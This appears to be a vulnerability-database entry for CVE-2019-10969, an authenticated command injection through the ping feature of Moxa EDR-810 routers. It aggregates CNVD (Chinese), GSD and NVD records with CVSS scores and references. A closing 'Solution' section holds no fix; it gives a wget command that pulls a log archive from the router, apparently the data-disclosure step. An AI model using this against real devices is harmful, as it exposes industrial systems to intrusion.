  "description": "Moxa EDR-810\u662f\u4e00\u6b3e\u9ad8\u5ea6\u96c6\u6210\u7684\u5de5\u4e1a\u591a\u7aef\u53e3\u5b89\u5168\u8def\u7531\u5668\uff0c\u5177\u6709\u9632\u706b\u5899/NAT/VPN\u53ca\u6258\u7ba1\u578b\u7b2c2\u5c42\u4ea4\u6362\u673a\u529f\u80fd\u3002\n\nMoxa EDR-810 5.1\u53ca\u66f4\u65e9\u7248\u672c\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u8be5\u4ea7\u54c1\u5141\u8bb8\u8ba4\u8bc1\u653b\u51fb\u8005\u6ee5\u7528ping\u529f\u80fd\uff0c\u4ece\u800c\u53ef\u5728\u8def\u7531\u5668\u4e0a\u6267\u884c\u672a\u7ecf\u6388\u6743\u7684\u547d\u4ee4\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2019-43363",
  "openTime": "2019-12-02",
  "patchDescription": "Moxa EDR-810\u662f\u4e00\u6b3e\u9ad8\u5ea6\u96c6\u6210\u7684\u5de5\u4e1a\u591a\u7aef\u53e3\u5b89\u5168\u8def\u7531\u5668\uff0c\u5177\u6709\u9632\u706b\u5899/NAT/VPN\u53ca\u6258\u7ba1\u578b\u7b2c2\u5c42\u4ea4\u6362\u673a\u529f\u80fd\u3002\r\n\r\nMoxa EDR-810 5.1\u53ca\u66f4\u65e9\u7248\u672c\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u8be5\u4ea7\u54c1\u5141\u8bb8\u8ba4\u8bc1\u653b\u51fb\u8005\u6ee5\u7528ping\u529f\u80fd\uff0c\u4ece\u800c\u53ef\u5728\u8def\u7531\u5668\u4e0a\u6267\u884c\u672a\u7ecf\u6388\u6743\u7684\u547d\u4ee4\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Moxa EDR-810\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "MOXA EDR-810 \u003c=5.1"
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2019-10969",
  "serverity": "\u4e2d",
  "submitTime": "2019-10-09",
  "title": "Moxa EDR-810\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e"
}

GSD-2019-10969

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2019-10969

Aliases

CVE-2019-10969

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2019-10969",
    "description": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution.",
    "id": "GSD-2019-10969",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2019-10969"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2019-10969"
      ],
      "details": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution.",
      "id": "GSD-2019-10969",
      "modified": "2023-12-13T01:23:58.204644Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "ics-cert@hq.dhs.gov",
        "ID": "CVE-2019-10969",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Moxa EDR 810",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "All versions 5.1 and prior"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "IMPROPER INPUT VALIDATION CWE-20"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03",
            "refsource": "MISC",
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
          },
          {
            "name": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2019-10969"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-20"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
            },
            {
              "name": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html",
              "refsource": "MISC",
              "tags": [],
              "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-23T20:15Z",
      "publishedDate": "2019-10-08T19:15Z"
    }
  }
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2019-10969 (GCVE-0-2019-10969)

Solution

Solution

wget http://192.168.0.1/MOXA_All_LOG.tar.gz

tar ztvf MOXA_All_LOG.tar.gz

Tags

Sightings

Nomenclature